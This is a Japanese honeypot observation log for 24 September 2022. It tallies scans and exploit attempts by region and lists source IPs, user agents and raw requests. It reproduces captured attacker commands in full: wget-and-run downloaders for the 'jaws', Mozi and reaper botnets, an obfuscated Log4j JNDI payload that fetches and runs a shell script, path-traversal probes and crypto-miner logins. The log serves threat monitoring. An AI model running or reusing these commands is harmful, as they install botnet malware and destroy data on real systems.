2022/09/24 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2022/09/24分です。

特徴

共通

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
phpMyAdminへのスキャン行為

Location:JP

D-link製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Lkx-Apache2449TraversalPluginによるスキャン行為
Lkx-TraversalHttpPluginによるスキャン行為
aiohttpによるスキャン行為
curlによるスキャン行為
l9exploreによるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 185.216.71.192/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget 79.110.62.227/lol.sh;
sh /tmp/lol.sh

cd /tmp;
rm -rf *;
wget 81.161.229.46/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget http://171.125.0.100:43186/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget http://183.150.217.242:54510/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location:US

Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ZmEuによるスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 103.159.64.218/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget 185.216.71.192/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget 81.161.229.46/jaws;
sh /tmp/jaws

Location:UK

Atlassian Jira Server/Data Centerの脆弱性(CVE-2021-26086)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
curlによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
/.gitへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  206.189.9.123/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget 81.161.229.46/jaws;
sh /tmp/jaws

Location:SG

NetGear製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
curlによるスキャン行為
.jsへのスキャン行為
WordPressへのスキャン行為
5.188.210.227に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  91.218.67.179/reaper/reap.arm4;
chmod 777 /tmp/reap.arm4;
sh /tmp/reap.arm4

cd /tmp;
rm -rf *;
wget 185.216.71.192/jaws;
sh /tmp/jaws

他

アクセス数推移

JP：総アクセス数：119 (前日比：-3)
US：総アクセス数：288 (前日比：147)
UK：総アクセス数：154 (前日比：89)
SG：総アクセス数：87 (前日比：-12)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	15.206.190.166	United States
1	20.216.184.192	United States
19	35.175.194.120	United States
1	41.35.12.233	Egypt
1	45.142.192.2	Romania
1	51.159.164.227	France
1	52.188.224.147	United States
1	59.92.172.184	India
1	76.6.28.176	United States
5	95.214.235.205	Ukraine
1	101.128.207.237	Japan
3	114.116.124.242	China
1	123.156.228.48	China
18	135.125.217.54	France
28	139.59.81.58	Singapore
10	161.35.188.242	United States
1	161.35.213.88	United States
1	162.142.125.8	United States
1	167.94.138.60	United States
1	167.248.133.62	United States
1	171.125.0.100	China
4	182.254.225.35	China
1	183.150.217.242	China
1	185.142.236.43	Seychelles
1	185.158.115.237	Russia
2	185.254.196.115	Ukraine
1	192.241.202.203	United States
1	192.241.220.12	United States
4	193.118.53.210	United States
1	197.32.63.243	Egypt
1	197.57.52.204	Egypt
1	198.235.24.20	United States
1	201.131.239.34	Mexico
2	205.185.122.184	United States

UserAgent一覧

件数	UserAgent
39	`-`
3	`Go-http-client/1.1`
7	`Hello, world`
1	`Lkx-Apache2449TraversalPlugin/0.0.1 (+https[:]//leakix[.]net/, +https[:]//twitter[.]com/HaboubiAnis)`
1	`Lkx-TraversalHttpPlugin/0.0.1 (+https[:]//leakix[.]net/, +https[:]//twitter[.]com/HaboubiAnis)`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
1	`Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1`
3	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36`
27	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
19	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0`
3	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
2	`Mozilla/5.0 zgrab/0.x`
1	`Python/3.7 aiohttp/3.7.4.post0`
1	`curl/7.81.0`
4	`l9explore/1.3.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`)\x1d\xd3\x05J\x8cD\xf0u\xb6\xa9\xbez\xbb\\\xab\xfd:\x1b!\xdd\x1eY!g\x92\x98\x8a\xd1\x1eY!\xdc\x1a\x1b!\xdd\x1eZ)\xdd\x1eY!\xdd\x1eY!w\x1eY!\xdd\x1er\n`
1		`MGLNDD_18.179.20.5_80\n`
1		`\n`
26		`\x16\x03\x01`
1		`\xaf`
1		`\xcabK\xf7g\x1f\xf8\x82\x1d\x1b\r\xb0FG\xd7y\x82/,\xdc\xa2\vn\xdc\x18\x87\xafw\xae\vn\xdc\xa3\x0f,\xdc\xa2\vm\xd4\xa2\vn\xdc\xa2\vn\xdc\b\vn\xdc\xa2\vE\xf7\xa2\vn\xdc\x8a\vn\xdc\xa2\vn\xdc\xa2\vn\xdc\xa2\vn\xdc\xa3\n`
1		`\xd1\xe4\xa7\xbd\x1e\xa9m\b_\xf0\xadn\n`
1	CONNECT	`leakix[.]net:443`	HTTP/1.1
1	GET	`/.DS_Store`	HTTP/1.1
1	GET	`/.aws/credentials`	HTTP/1.1
1	GET	`/.env.bak`	HTTP/1.1
30	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`//dashboard/phpinfo.php`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/_wpeprivate/config.json`	HTTP/1.1
1	GET	`/admin/.env`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/aws.yml`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
2	GET	`/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts`	HTTP/1.1
1	GET	`/config.js`	HTTP/1.1
1	GET	`/config/aws.yml`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
1	GET	`/exactarget/`	HTTP/1.1
8	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/info.json`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/login.action`	HTTP/1.1
1	GET	`/php-info`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo`	HTTP/1.1
1	GET	`/phpmyadmin/index.php`	HTTP/1.1
1	GET	`/phpmyadmin4.8.5/index.php`	HTTP/1.1
1	GET	`/pmd/index.php`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
3	GET	`/shell?cd+/tmp;rm+-rf+*;wget+185[.]216[.]71[.]192/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+79[.]110[.]62[.]227/lol.sh;sh+/tmp/lol.sh`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+81[.]161[.]229[.]46/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//171[.]125[.]0[.]100:43186/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//183[.]150[.]217[.]242:54510/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
1	GET	`/test.php`	HTTP/1.1
1	GET	`http[:]//18[.]179[.]20[.]5:80/db/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/mysql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/pma/scripts/setup.php`	HTTP/1.0
1	HEAD	`/`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/.%2e/%2e%2e/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/sphere1.png`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
1	PUT	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
130	18.191.100.64	United States
1	20.124.127.186	United States
1	34.96.235.26	United States
1	45.57.161.10	Canada
8	51.79.29.48	Canada
33	52.149.159.169	United States
14	54.37.79.75	France
1	89.185.17.61	Ukraine
3	103.199.209.143	India
1	104.149.131.207	United States
1	117.212.170.70	India
1	117.216.23.57	India
4	143.198.122.137	United States
2	152.89.196.211	Russia
1	159.223.175.248	United States
6	162.55.221.49	Germany
2	162.142.125.8	United States
2	162.142.125.219	United States
4	162.221.192.26	United States
54	163.123.142.153	United States
2	167.94.138.61	United States
1	167.235.70.190	Germany
1	182.127.209.229	China
1	184.105.139.67	United States
1	185.158.113.63	Russia
1	192.241.206.36	United States
1	192.241.220.166	United States
1	193.46.255.41	Romania
2	194.165.16.11	Panama
1	197.33.157.226	Egypt
1	198.235.24.18	United States
1	205.185.122.184	United States
1	205.210.31.42	United States
2	209.141.40.123	United States
1	218.150.111.218	South Korea

UserAgent一覧

件数	UserAgent
14	`-`
1	`Hello, World`
7	`Hello, world`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 Edg/104.0.1293.63`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
33	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0`
25	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
55	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
130	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0`
3	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
2	`Mozilla/5.0 zgrab/0.x`
6	`Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36`
2	`ZmEu`
1	t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//159[.]223[.]175[.]248:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE5OS4xOTUuMjUzLjE4NzoxOTgwL2FrdHVhbGlzaWVyZW4uc2ggLW8gYWt0dWFsaXNpZXJlbi5zaDsgd2dldCBodHRwOi8vMTk5LjE5NS4yNTMuMTg3OjE5ODAvYWt0dWFsaXNpZXJlbi5zaDsgY2htb2QgNzc3IGFrdHVhbGlzaWVyZW4uc2g7IHNoIGFrdHVhbGlzaWVyZW4uc2g7IHJtIC1yZiBha3R1YWxpc2llcmVuLnNoOyBybSAtcmYgYWt0dWFsaXNpZXJlbi5zaC4x}')

リクエスト内容一覧

件数	Method	Request	Protocol
3		`\x03`
6		`\x16\x03\x01`
1	GET	`/.aws/credentials`	HTTP/1.1
1	GET	`/.config/gatsby/config.json`	HTTP/1.1
1	GET	`/.cordova/config.json`	HTTP/1.1
1	GET	`/.deployment-config.json`	HTTP/1.1
1	GET	`/.docker/.env`	HTTP/1.1
1	GET	`/.docker/daemon.json`	HTTP/1.1
1	GET	`/.docker/laravel/app/.env`	HTTP/1.1
1	GET	`/.env.bak`	HTTP/1.1
1	GET	`/.env.dev`	HTTP/1.1
1	GET	`/.env.development.local`	HTTP/1.1
1	GET	`/.env.local`	HTTP/1.1
1	GET	`/.env.prod`	HTTP/1.1
1	GET	`/.env.production.local`	HTTP/1.1
1	GET	`/.env.production`	HTTP/1.1
1	GET	`/.env.save`	HTTP/1.1
1	GET	`/.env.stage`	HTTP/1.1
1	GET	`/.env.test.local`	HTTP/1.1
1	GET	`/.env.test`	HTTP/1.1
27	GET	`/.env`	HTTP/1.1
1	GET	`/.environment`	HTTP/1.1
1	GET	`/.envr`	HTTP/1.1
1	GET	`/.envs`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/.gitlab-ci/.env`	HTTP/1.1
1	GET	`/.jupyter/jupyter_notebook_config.json`	HTTP/1.1
1	GET	`/.lanproxy/config.json`	HTTP/1.1
1	GET	`/.vscode/.env`	HTTP/1.1
1	GET	`//.msmtprc`	HTTP/1.1
1	GET	`//_profiler/phpinfo.php`	HTTP/1.1
1	GET	`//_profiler/phpinfo`	HTTP/1.1
1	GET	`//asdf[.]php`	HTTP/1.1
1	GET	`//dashboard/phpinfo.php`	HTTP/1.1
1	GET	`//debug/default/view.html`	HTTP/1.1
1	GET	`//debug/default/view`	HTTP/1.1
1	GET	`//frontend/web/debug/default/view`	HTTP/1.1
1	GET	`//frontend_dev[.]php/$`	HTTP/1.1
1	GET	`//i[.]php`	HTTP/1.1
1	GET	`//misc/info.php`	HTTP/1.1
1	GET	`//misc/phpinfo.php`	HTTP/1.1
1	GET	`//phpversion[.]php`	HTTP/1.1
1	GET	`//sapi/debug/default/view`	HTTP/1.1
1	GET	`//time[.]php`	HTTP/1.1
1	GET	`//tool/view/phpinfo.view.php`	HTTP/1.1
1	GET	`//web/debug/default/view`	HTTP/1.1
1	GET	`//wp-config.php-backup`	HTTP/1.1
1	GET	`/1index.php`	HTTP/1.1
1	GET	`/83.118.68.34.bc.googleusercontent.com/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?id=`	HTTP/1.1
1	GET	`/PhPinfo.php`	HTTP/1.1
1	GET	`/_wpeprivate/config.json`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
2	GET	`/admin/.env`	HTTP/1.1
2	GET	`/api/.env`	HTTP/1.1
1	GET	`/app/.env`	HTTP/1.1
1	GET	`/app/config/.env`	HTTP/1.1
1	GET	`/app/config/config.yml`	HTTP/1.1
1	GET	`/app/config/parameters.yml`	HTTP/1.1
1	GET	`/app/config/secrets.yml`	HTTP/1.1
1	GET	`/apps/.env`	HTTP/1.1
1	GET	`/audio/.env`	HTTP/1.1
1	GET	`/aws.yml`	HTTP/1.1
1	GET	`/backend/.env`	HTTP/1.1
1	GET	`/base/.env`	HTTP/1.1
1	GET	`/blog/.env`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=ec8&psd=ec8`	HTTP/1.0
1	GET	`/boaform/admin/formLogin?username=user&psd=user`	HTTP/1.0
1	GET	`/cgi-bin/.env`	HTTP/1.1
1	GET	`/conf/.env`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
1	GET	`/config/aws.yml`	HTTP/1.1
1	GET	`/config/secrets.yml`	HTTP/1.1
1	GET	`/console/base/config.json`	HTTP/1.1
1	GET	`/console/payments/config.json`	HTTP/1.1
1	GET	`/core/.env`	HTTP/1.1
1	GET	`/crm/.env`	HTTP/1.1
1	GET	`/database.yml`	HTTP/1.1
1	GET	`/database/.env`	HTTP/1.1
5	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/help.php`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/i.php`	HTTP/1.1
1	GET	`/index.php`	HTTP/1.1
1	GET	`/info-php.php`	HTTP/1.1
1	GET	`/info.json`	HTTP/1.1
2	GET	`/info.php`	HTTP/1.1
1	GET	`/info_php.php`	HTTP/1.1
1	GET	`/infophp.php`	HTTP/1.1
1	GET	`/information.php`	HTTP/1.1
1	GET	`/information`	HTTP/1.1
2	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/library/.env`	HTTP/1.1
1	GET	`/linusadmin-phpinfo.php`	HTTP/1.1
1	GET	`/local/.env`	HTTP/1.1
1	GET	`/mailer/.env`	HTTP/1.1
1	GET	`/new/.env`	HTTP/1.1
1	GET	`/newsite/.env`	HTTP/1.1
1	GET	`/old/.env`	HTTP/1.1
1	GET	`/old_phpinfo.php`	HTTP/1.1
1	GET	`/p-info.php`	HTTP/1.1
1	GET	`/p.php`	HTTP/1.1
1	GET	`/p_info.php`	HTTP/1.1
1	GET	`/peep.php`	HTTP/1.1
1	GET	`/php-info.php`	HTTP/1.1
1	GET	`/php-info/info.php`	HTTP/1.1
1	GET	`/php-info/php-details.php`	HTTP/1.1
1	GET	`/php-info/php-info.php`	HTTP/1.1
1	GET	`/php-info/php.php`	HTTP/1.1
1	GET	`/php-info/php_details.php`	HTTP/1.1
1	GET	`/php-info/php_info.php`	HTTP/1.1
1	GET	`/php-info/phpdetails.php`	HTTP/1.1
1	GET	`/php-info/phpinfo.php`	HTTP/1.1
1	GET	`/php-info/pinfo.php`	HTTP/1.1
1	GET	`/php-info`	HTTP/1.1
1	GET	`/php-information`	HTTP/1.1
1	GET	`/php.php`	HTTP/1.1
1	GET	`/php_details`	HTTP/1.1
1	GET	`/php_info.php`	HTTP/1.1
1	GET	`/php_info/info.php`	HTTP/1.1
1	GET	`/php_info/php-details.php`	HTTP/1.1
1	GET	`/php_info/php-info.php`	HTTP/1.1
1	GET	`/php_info/php.php`	HTTP/1.1
1	GET	`/php_info/php_details.php`	HTTP/1.1
1	GET	`/php_info/php_info.php`	HTTP/1.1
1	GET	`/php_info/phpdetails.php`	HTTP/1.1
1	GET	`/php_info/phpinfo.php`	HTTP/1.1
1	GET	`/php_info/pinfo.php`	HTTP/1.1
1	GET	`/phpdetails`	HTTP/1.1
2	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo/info.php`	HTTP/1.1
1	GET	`/phpinfo/php-details.php`	HTTP/1.1
1	GET	`/phpinfo/php-info.php`	HTTP/1.1
1	GET	`/phpinfo/php.php`	HTTP/1.1
1	GET	`/phpinfo/php_details.php`	HTTP/1.1
1	GET	`/phpinfo/php_info.php`	HTTP/1.1
1	GET	`/phpinfo/phpdetails.php`	HTTP/1.1
1	GET	`/phpinfo/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo/pinfo.php`	HTTP/1.1
2	GET	`/phpinfo`	HTTP/1.1
1	GET	`/phpinformation.php`	HTTP/1.1
1	GET	`/phpinformation`	HTTP/1.1
1	GET	`/phpmyadmin/scripts/setup.php`	HTTP/1.1
1	GET	`/pinfo.php`	HTTP/1.1
1	GET	`/pip.php`	HTTP/1.1
1	GET	`/pop.php`	HTTP/1.1
1	GET	`/prod/.env`	HTTP/1.1
1	GET	`/protected/.env`	HTTP/1.1
2	GET	`/public/.env`	HTTP/1.1
1	GET	`/root/.env`	HTTP/1.1
1	GET	`/ru.php`	HTTP/1.1
1	GET	`/saudi.php`	HTTP/1.1
1	GET	`/secrets.yml`	HTTP/1.1
1	GET	`/server/config.json`	HTTP/1.1
1	GET	`/shell4.php`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+103[.]159[.]64[.]218/jaws;sh+/tmp/jaws`	HTTP/1.1
5	GET	`/shell?cd+/tmp;rm+-rf+*;wget+185[.]216[.]71[.]192/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+81[.]161[.]229[.]46/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/sites/all/libraries/mailchimp/.env`	HTTP/1.1
1	GET	`/something.php`	HTTP/1.1
1	GET	`/src/.env`	HTTP/1.1
1	GET	`/storage/.env`	HTTP/1.1
1	GET	`/test.php`	HTTP/1.1
1	GET	`/twitter/.env`	HTTP/1.1
1	GET	`/vendor/.env`	HTTP/1.1
1	GET	`/vendor/laravel/.env`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/w00tw00t.at.blackhats.romanian.anti-sec:)`	HTTP/1.1
1	GET	`/wp-admin/.env`	HTTP/1.1
1	GET	`/wp-content/.env`	HTTP/1.1
1	GET	`/wp-content/themes/seotheme/mar.php`	HTTP/1.1
1	GET	`/wp-includes/shell20211028.php`	HTTP/1.1
1	GET	`/www/.env`	HTTP/1.1
1	GET	`/z.php`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/.%2e/%2e%2e/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/sphere1.png`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
55	POST	`/boaform/admin/formLogin`	HTTP/1.1
3	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	4.1.229.86	United States
1	36.110.214.195	China
7	45.55.42.35	United States
10	45.148.120.191	Netherlands
1	78.142.18.92	Bulgaria
4	101.33.247.52	China
1	117.212.168.193	India
4	128.14.134.170	United States
20	134.209.150.222	United States
2	139.59.31.211	Singapore
12	139.59.83.146	Singapore
2	152.89.196.211	Russia
2	162.142.125.212	United States
2	167.94.138.60	United States
2	167.248.133.47	United States
17	170.187.181.59	United States
1	172.105.89.161	United States
1	192.241.206.115	United States
1	192.241.212.107	United States
1	193.42.11.176	Germany
1	193.46.255.41	Romania
2	193.56.29.26	United Kingdom
56	195.96.137.7	United States
1	198.235.24.44	United States
1	205.210.31.132	United States
1	221.127.28.199	Hong Kong

UserAgent一覧

件数	UserAgent
58	`-`
16	`Go-http-client/1.1`
1	`Hello, world`
2	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; ; NCLIENT50_AAPCDA5841E333)`
1	`Mozilla/5.0 zgrab/0.x`
1	`curl/7.29.0`
54	`curl/7.54.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`:\xd03D\x1c\xc7\x17\xddI\x949\x84\n`
1		`E\x8e0\v\x13\xb3E\xb4\x14\n`
1		`HELP`
1		`MGLNDD_132.145.66.34_80\n`
1		`N\x15p\xd0gc!\xfa\x18o\n`
1		`\x03`
2		`\x16\x03\x01\x02`
33		`\x16\x03\x01`
1		`\xb7Y\n`
1		`\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159`	X\xd4>\x12\x98\xc4<\xe0\x13\xcf
1		`{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"47sKiKEo6y8PRnokXqsea4BnL9iogakHUBqVD8JdvXrBHJdtQx1GxqzVvxACkP7JEZFVLQg18CPEuYmYiSLpjUpd1Tz3bLm\",\"pass\":\"x\",\"agent\":\"XMRig/6.15.3`	(Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\",\"algo\":[\"cn/1\",\"cn/2\",\"cn/r\",\"cn/fast\",\"cn/half\",\"cn/xao\",\"cn/rto\",\"cn/rwz\",\"cn/zls\",\"cn/double\",\"cn/ccx\",\"cn-lite/1\",\"cn-heavy/0\",\"cn-heavy/tube\",\"cn-heavy/xhv\",\"cn-pico\",\"cn-pico/tlo\",\"cn/upx2\",\"rx/0\",\"rx/wow\",\"rx/arq\",\"rx/graft\",\"rx/sfx\",\"rx/keva\",\"argon2/chukwa\",\"argon2/chukwav2\",\"argon2/ninja\",\"astrobwt\"]}}\n
1		`{\"id\":1,\"method\":\"eth_submitLogin\",\"worker\":\"eth1.0\",\"params\":[\"0x0e565c331401a64fe3bfed2aeb16dadde341ccb0\",\"x\"],\"jsonrpc\":\"2.0\"}\n`
1		`{\"id\":`	1, \"method\": \"mining.subscribe\", \"params\": [\"MinerName/1.0.0\", \"EthereumStratum/1.0.0\"]}\n
1		`{\"id\":`	1, \"method\": \"mining.subscribe\", \"params\": [\"cpuminer/2.5.1\"]}\n
1	CONNECT	`google[.]com:443`	HTTP/1.1
1	GET	`/.DS_Store`	HTTP/1.1
3	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000`	HTTP/1.1
1	GET	`/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?rest_route=/wp/v2/users/`	HTTP/1.1
1	GET	`/CSS/Miniweb.css`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/Portal/Portal.mwsl`	HTTP/1.1
1	GET	`/Portal0000.htm`	HTTP/1.1
1	GET	`/SiteLoader`	HTTP/1.1
1	GET	`/WuEL`	HTTP/1.1
1	GET	`/__Additional`	HTTP/1.1
1	GET	`/a`	HTTP/1.1
1	GET	`/about`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin.asp`	HTTP/1.1
1	GET	`/admin.aspx`	HTTP/1.1
1	GET	`/admin.cgi`	HTTP/1.1
1	GET	`/admin.html`	HTTP/1.1
1	GET	`/admin.jhtml`	HTTP/1.1
1	GET	`/admin.jsa`	HTTP/1.1
1	GET	`/admin.php`	HTTP/1.1
1	GET	`/admin.pl`	HTTP/1.1
1	GET	`/admin.shtml`	HTTP/1.1
1	GET	`/api/search?folderIds=0`	HTTP/1.1
1	GET	`/base.inc`	HTTP/1.1
1	GET	`/base.jsp`	HTTP/1.1
1	GET	`/base.php`	HTTP/1.1
